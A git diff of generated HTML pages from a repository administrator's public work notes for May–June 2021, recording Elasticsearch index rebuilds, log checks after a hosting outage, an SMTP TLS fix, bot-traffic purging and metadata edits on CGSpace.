+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
+</span></span></code></pre></div><ul>
+<li>The indexes look OK so I started a harvesting on AReS</li>
+</ul>
+<h2 id="2021-05-25">2021-05-25</h2>
+<ul>
+<li>The AReS harvest got messed up somehow, as I see the number of items in the indexes are the same as before the harvesting:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items                                                
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      soEzAnp3TDClIGZbmVyEIw 1 1    953      0   2.3mb   2.3mb
+</span></span></code></pre></div><ul>
+<li>Update all docker images on the AReS server (linode20):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
+</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml build
+</span></span></code></pre></div><ul>
+<li>Then run all system updates on the server and reboot it</li>
+<li>Oh crap, I deleted everything on AReS and restored the backup and the total items are now 104317&hellip; so it was actually correct before!</li>
+<li>For reference, this is how I re-created everything:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
+</span></span><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
+</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
+</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
+</span></span><span style="display:flex;"><span>curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
+</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
+</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
+</span></span></code></pre></div><ul>
+<li>I will just start a new harvest&hellip; sigh</li>
+</ul>
+<h2 id="2021-05-26">2021-05-26</h2>
+<ul>
+<li>The AReS harvest last night got stuck at 3:20AM (UTC+3) at 752 pages for some reason&hellip;
+<ul>
+<li>Something seems to have happened on CGSpace this morning around then as I have an alert from UptimeRobot as well</li>
+<li>I re-created everything as above (again) and restarted the harvest</li>
+</ul>
+</li>
+<li>Looking in the DSpace log for this morning I see a big hole in the logs at that time (UTC+2 server time):</li>
+</ul>
+<pre tabindex="0"><code>2021-05-26 02:17:52,808 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: &#39;10568/70659: item has country codes, skipping&#39;
+2021-05-26 02:17:52,853 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: &#39;10568/66761: item has country codes, skipping&#39;
+2021-05-26 03:00:05,772 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.spidersfile:null
+2021-05-26 03:00:05,773 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.server:http://localhost:8081/solr/statistics
+</code></pre><ul>
+<li>There are no logs between 02:17 and 03:00&hellip; hmmm.</li>
+<li>I see a similar gap in the Solr log, though it starts at 02:15:</li>
+</ul>
+<pre tabindex="0"><code>2021-05-26 02:15:07,968 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={f.location.coll.facet.sort=count&amp;facet.field=location.comm&amp;facet.field=location.coll&amp;fl=handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=search.resourcetype:2&amp;fq=NOT(discoverable:false)&amp;rows=0&amp;version=2&amp;q=*:*&amp;f.location.coll.facet.limit=-1&amp;facet.mincount=1&amp;facet=true&amp;f.location.comm.facet.sort=count&amp;wt=javabin&amp;facet.offset=0&amp;f.location.comm.facet.limit=-1} hits=90792 status=0 QTime=6 
+2021-05-26 02:15:09,446 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/update params={wt=javabin&amp;version=2} status=0 QTime=1 
+2021-05-26 02:28:03,602 INFO  org.apache.solr.update.UpdateHandler @ start commit{,optimize=false,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
+2021-05-26 02:28:03,630 INFO  org.apache.solr.core.SolrCore @ SolrDeletionPolicy.onCommit: commits: num=2
+        commit{dir=NRTCachingDirectory(MMapDirectory@/home/cgspace.cgiar.org/solr/statistics/data/index lockFactory=NativeFSLockFactory@/home/cgspace.cgiar.org/solr/statistics/data/index; maxCacheMB=48.0 maxMergeSizeMB=4.0),segFN=segments_n6ns,generation=1081720}
+        commit{dir=NRTCachingDirectory(MMapDirectory@/home/cgspace.cgiar.org/solr/statistics/data/index lockFactory=NativeFSLockFactory@/home/cgspace.cgiar.org/solr/statistics/data/index; maxCacheMB=48.0 maxMergeSizeMB=4.0),segFN=segments_n6nt,generation=1081721}
+2021-05-26 02:28:03,630 INFO  org.apache.solr.core.SolrCore @ newest commit generation = 1081721
+2021-05-26 02:28:03,632 INFO  org.apache.solr.search.SolrIndexSearcher @ Opening Searcher@34f2c871[statistics] main
+2021-05-26 02:28:03,633 INFO  org.apache.solr.core.SolrCore @ QuerySenderListener sending requests to Searcher@34f2c871[statistics] main{StandardDirectoryReader(segments_n5xy:4540675:nrt _1befl(4.10.4):C42054400/925069:delGen=8891 _1bksq(4.10.4):C685090/92211:delGen=1227 _1bx0c(4.10.4):C1069897/49988:delGen=966 _1bxr2(4.10.4):C197387/5860:delGen=485 _1cc1x(4.10.4):C353338/40887:delGen=626 _1ck6k(4.10.4):C1009357/39041:delGen=166 _1celj(4.10.4):C268907/18097:delGen=340 _1clq9(4.10.4):C147453/25003:delGen=68 _1cn3t(4.10.4):C260311/1802:delGen=82 _1cl3c(4.10.4):C47408/2610:delGen=39 _1cnmh(4.10.4):C32851/237:delGen=41 _1cod4(4.10.4):C85915/281:delGen=35 _1coy4(4.10.4):C178367/483:delGen=27 _1cpgs(4.10.4):C25465/81:delGen=13 _1cppf(4.10.4):C101411/154:delGen=15 _1cqc4(4.10.4):C26003/39:delGen=8 _1cpvl(4.10.4):C24160/91:delGen=8 _1cq3n(4.10.4):C18167/39:delGen=4 _1cq15(4.10.4):C9983/13:delGen=2 _1cq79(4.10.4):C13077/19:delGen=4 _1cqhz(4.10.4):C21251/2:delGen=1 _1cqka(4.10.4):C3531 _1cqku(4.10.4):C2597 _1cqkk(4.10.4):C2951 _1cqjq(4.10.4):C2675 _1cql5(4.10.4):C993 _1cql6(4.10.4):C161 _1cql7(4.10.4):C106 _1cql8(4.10.4):C19 _1cql9(4.10.4):C147 _1cqla(4.10.4):C2 _1cqlb(4.10.4):C15)}
+2021-05-26 02:28:03,633 INFO  org.apache.solr.core.SolrCore @ QuerySenderListener done.
+</code></pre><ul>
+<li>Ah, it seems to have been a <a href="https://status.linode.com/incidents/byqmt6nss9l0">Linode network issue in the Frankfurt region</a>:</li>
+</ul>
+<pre tabindex="0"><code>May 26, 2021
+Connectivity Issue - Frankfurt
+Resolved - We haven’t observed any additional connectivity issues in our Frankfurt data center, and will now consider this incident resolved. If you continue to experience problems, please open a Support ticket for assistance.
+May 26, 02:57 UTC 
+</code></pre><ul>
+<li>While looking in the logs I noticed an error about SMTP:</li>
+</ul>
+<pre tabindex="0"><code>2021-05-26 02:00:18,015 ERROR org.dspace.eperson.SubscribeCLITool @ Failed to send subscription to eperson_id=934cb92f-2e77-4881-89e2-6f13ad4b1378
+2021-05-26 02:00:18,015 ERROR org.dspace.eperson.SubscribeCLITool @ javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
+</code></pre><ul>
+<li>And indeed the email seems to be broken:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace test-email
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
+</span></span><span style="display:flex;"><span> - To: fuuuuuu
+</span></span><span style="display:flex;"><span> - Subject: DSpace test email
+</span></span><span style="display:flex;"><span> - Server: smtp.office365.com
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
+</span></span><span style="display:flex;"><span> - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
+</span></span></code></pre></div><ul>
+<li>I saw a recent thread on the dspace-tech mailing list about this that makes me wonder if Microsoft changed something on Office 365
+<ul>
+<li>I added <code>mail.smtp.ssl.protocols=TLSv1.2</code> to the <code>mail.extraproperties</code> in dspace.cfg and the test email sent successfully</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-05-30">2021-05-30</h2>
+<ul>
+<li>Reset the Elasticsearch indexes on AReS as above and start a fresh harvest
+<ul>
+<li>The indexing finished and the total number of items is now 104504, but I&rsquo;m sure the indexes are messed up so I will just start by taking a backup and re-creating them manually before every indexing</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-06/index.html b/docs/2021-06/index.html
new file mode 100644
index 000000000..e5a9c05bc
--- /dev/null
+++ b/docs/2021-06/index.html
@@ -0,0 +1,747 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2021" />
+<meta property="og:description" content="2021-06-01
+
+IWMI notified me that AReS was down with an HTTP 502 error
+
+Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification
+I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the angular_nginx container isn&rsquo;t running
+I simply started it and AReS was running again:
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-06/" />
+<meta property="article:published_time" content="2021-06-01T10:51:07+03:00" />
+<meta property="article:modified_time" content="2021-07-01T08:53:21+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2021"/>
+<meta name="twitter:description" content="2021-06-01
+
+IWMI notified me that AReS was down with an HTTP 502 error
+
+Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification
+I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the angular_nginx container isn&rsquo;t running
+I simply started it and AReS was running again:
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-06/",
+  "wordCount": "3505",
+  "datePublished": "2021-06-01T10:51:07+03:00",
+  "dateModified": "2021-07-01T08:53:21+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-06/">
+
+    <title>June, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-06/">June, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-06-01T10:51:07+03:00">Tue Jun 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-06-01">2021-06-01</h2>
+<ul>
+<li>IWMI notified me that AReS was down with an HTTP 502 error
+<ul>
+<li>Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification</li>
+<li>I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the <code>angular_nginx</code> container isn&rsquo;t running</li>
+<li>I simply started it and AReS was running again:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml start angular_nginx
+</span></span></code></pre></div><ul>
+<li>Margarita from CCAFS emailed me to say that workflow alerts haven&rsquo;t been working lately
+<ul>
+<li>I guess this is related to the SMTP issues last week</li>
+<li>I had fixed the config, but didn&rsquo;t restart Tomcat so DSpace didn&rsquo;t load the new variables</li>
+<li>I ran all system updates on CGSpace (linode18) and DSpace Test (linode26) and rebooted the servers</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-06-03">2021-06-03</h2>
+<ul>
+<li>Meeting with AMCOW and IWMI to discuss AMCOW getting IWMI&rsquo;s content into the new AMCOW Knowledge Hub
+<ul>
+<li>At first we spent some time talking about DSpace communities/collections and the REST API, but then they said they actually prefer to send queries to sites on the fly and cache them in Redis for some time</li>
+<li>That&rsquo;s when I thought they could perhaps use the OpenSearch, but I can&rsquo;t remember if it&rsquo;s possible to limit by community, or only collection&hellip;</li>
+<li>Looking now, I see there is a &ldquo;scope&rdquo; parameter that can be used for community or collection, for example:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>https://cgspace.cgiar.org/open-search/discover?query=subject:water%20scarcity&amp;scope=10568/16814&amp;order=DESC&amp;rpp=100&amp;sort_by=2&amp;start=1
+</code></pre><ul>
+<li>That will sort by date issued (see: <code>webui.itemlist.sort-option.2</code> in dspace.cfg), give 100 results per page, and start on item 1</li>
+<li>Otherwise, another alternative would be to use the IWMI CSV that we are already exporting every week</li>
+<li>Fill out the <em>CGIAR-AGROVOC Task Group: Survey on the current CGIAR use of AGROVOC</em> survey on behalf of CGSpace</li>
+</ul>
+<h2 id="2021-06-06">2021-06-06</h2>
+<ul>
+<li>The Elasticsearch indexes are messed up so I dumped and re-created them correctly:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
+</span></span><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
+</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
+</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
+</span></span><span style="display:flex;"><span>curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
+</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
+</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
+</span></span></code></pre></div><ul>
+<li>Then I started a harvesting on AReS</li>
+</ul>
+<h2 id="2021-06-07">2021-06-07</h2>
+<ul>
+<li>The harvesting on AReS completed successfully</li>
+<li>Provide feedback to FAO on how we use AGROVOC for their &ldquo;AGROVOC call for use cases&rdquo;</li>
+</ul>
+<h2 id="2021-06-10">2021-06-10</h2>
+<ul>
+<li>Skype with Moayad to discuss AReS harvesting improvements
+<ul>
+<li>He will work on a plugin that reads the XML sitemap to get all item IDs and checks whether we have them or not</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-06-14">2021-06-14</h2>
+<ul>
+<li>Dump and re-create indexes on AReS (as above) so I can do a harvest</li>
+</ul>
+<h2 id="2021-06-16">2021-06-16</h2>
+<ul>
+<li>Looking at the Solr statistics on CGSpace for last month I see many requests from hosts using seemingly normal Windows browser user agents, but using the MSN bot&rsquo;s DNS
+<ul>
+<li>For example, user agent <code>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)</code> with DNS <code>msnbot-131-253-25-91.search.msn.com.</code></li>
+<li>I queried Solr for all hits using the MSN bot DNS (<code>dns:*msnbot* AND dns:*.msn.com.</code>) and found 457,706</li>
+<li>I extracted their IPs using Solr&rsquo;s CSV format and ran them through my <code>resolve-addresses.py</code> script and found that they all belong to MICROSOFT-CORP-MSN-AS-BLOCK (AS8075)</li>
+<li>Note that <a href="https://www.bing.com/webmasters/help/how-to-verify-bingbot-3905dc26">Microsoft&rsquo;s docs say that reverse lookups on Bingbot IPs will always have &ldquo;search.msn.com&rdquo;</a> so it is safe to purge these as non-human traffic</li>
+<li>I purged the hits with <code>ilri/check-spider-ip-hits.sh</code> (though I had to do it in 3 batches because I forgot to increase the <code>facet.limit</code> so I was only getting them 100 at a time)</li>
+</ul>
+</li>
+<li>Moayad sent a pull request a few days ago to re-work the harvesting on OpenRXV
+<ul>
+<li>It will hopefully also fix the duplicate and missing items issues</li>
+<li>I had a Skype with him to discuss</li>
+<li>I got it running on podman-compose, but I had to fix the storage permissions on the Elasticsearch volume after the first time it tries (and fails) to run:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
+</span></span></code></pre></div><ul>
+<li>The new OpenRXV harvesting method by Moayad uses pages of 10 items instead of 100 and it&rsquo;s much faster
+<ul>
+<li>I harvested 90,000+ items from DSpace Test in ~3 hours</li>
+<li>There seem to be some issues with the health check step though, as I see it is requesting one restricted item 600,000+ times&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-06-17">2021-06-17</h2>
+<ul>
+<li>I ported my ilri/resolve-addresses.py script that uses IPAPI.co to use the local GeoIP2 databases
+<ul>
+<li>The new script is ilri/resolve-addresses-geoip2.py and it is much faster and works offline with no API rate limits</li>
+</ul>
+</li>
+<li>Teams meeting with the CGIAR Metadata Working group to discuss CGSpace and open repositories and the way forward</li>
+<li>More work with Moayad on OpenRXV harvesting issues
+<ul>
+<li>Using a JSON export from elasticdump we debugged the duplicate checker plugin and found that there are indeed duplicates:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>90459
+</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>90380
+</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>      2 &#34;10568/99409&#34;
+</span></span><span style="display:flex;"><span>      2 &#34;10568/99410&#34;
+</span></span><span style="display:flex;"><span>      2 &#34;10568/99411&#34;
+</span></span><span style="display:flex;"><span>      2 &#34;10568/99516&#34;
+</span></span><span style="display:flex;"><span>      3 &#34;10568/102093&#34;
+</span></span><span style="display:flex;"><span>      3 &#34;10568/103524&#34;
+</span></span><span style="display:flex;"><span>      3 &#34;10568/106664&#34;
+</span></span><span style="display:flex;"><span>      3 &#34;10568/106940&#34;
+</span></span><span style="display:flex;"><span>      3 &#34;10568/107195&#34;
+</span></span><span style="display:flex;"><span>      3 &#34;10568/96546&#34;
+</span></span></code></pre></div><h2 id="2021-06-20">2021-06-20</h2>
+<ul>
+<li>Udana asked me to update their IWMI subjects from <code>farmer managed irrigation systems</code> to <code>farmer-led irrigation</code>
+<ul>
+<li>First I extracted the IWMI community from CGSpace:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
+</span></span></code></pre></div><ul>
+<li>Then I used <code>csvcut</code> to extract just the columns I needed and do the replacement into a new CSV:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dcterms.subject[],dcterms.subject[en_US]&#39;</span> /tmp/2021-06-20-IWMI.csv | sed <span style="color:#e6db74">&#39;s/farmer managed irrigation systems/farmer-led irrigation/&#39;</span> &gt; /tmp/2021-06-20-IWMI-new-subjects.csv
+</span></span></code></pre></div><ul>
+<li>Then I uploaded the resulting CSV to CGSpace, updating 161 items</li>
+<li>Start a harvest on AReS</li>
+<li>I found <a href="https://jira.lyrasis.org/browse/DS-1977">a bug</a> and <a href="https://github.com/DSpace/DSpace/pull/2584">a patch</a> for the private items showing up in the DSpace sitemap bug
+<ul>
+<li>The fix is super simple, I should try to apply it</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-06-21">2021-06-21</h2>
+<ul>
+<li>The AReS harvesting finished, but the indexes got messed up again</li>
+<li>I was looking at the JSON export I made yesterday and trying to understand the situation with duplicates
+<ul>
+<li>We have 90,000+ items, but only 85,000 unique:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>90937
+</span></span><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort -u | wc -l
+</span></span><span style="display:flex;"><span>85709
+</span></span></code></pre></div><ul>
+<li>So those could be duplicates from the way we harvest pages, but they could also be from mappings&hellip;
+<ul>
+<li>Manually inspecting the duplicates where handles appear more than once:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort | uniq -c | sort -h
+</span></span></code></pre></div><ul>
+<li>Unfortunately I found no pattern:
+<ul>
+<li>Some appear twice in the Elasticsearch index, but appear in only one collection</li>
+<li>Some appear twice in the Elasticsearch index, and appear in <em>two</em> collections</li>
+<li>Some appear twice in the Elasticsearch index, but appear in three collections (!)</li>
+</ul>
+</li>
+<li>So really we need to just check whether a handle exists before we insert it</li>
+<li>I tested the <a href="https://github.com/DSpace/DSpace/pull/2584">pull request for DS-1977</a> that adjusts the sitemap generation code to exclude private items
+<ul>
+<li>It applies cleanly and seems to work, but we don&rsquo;t actually have any private items</li>
+<li>The issue we are having with AReS hitting restricted items in the sitemap is that the items have restricted metadata, not that they are private</li>
+</ul>
+</li>
+<li>Testing the <a href="https://github.com/DSpace/DSpace/pull/2275">pull request for DS-4065</a> where the REST API&rsquo;s <code>/rest/items</code> endpoint is not aware of private items and returns an incorrect number of items
+<ul>
+<li>This is most easily seen by setting a low limit in <code>/rest/items</code>, making one of the items private, and requesting items again with the same limit</li>
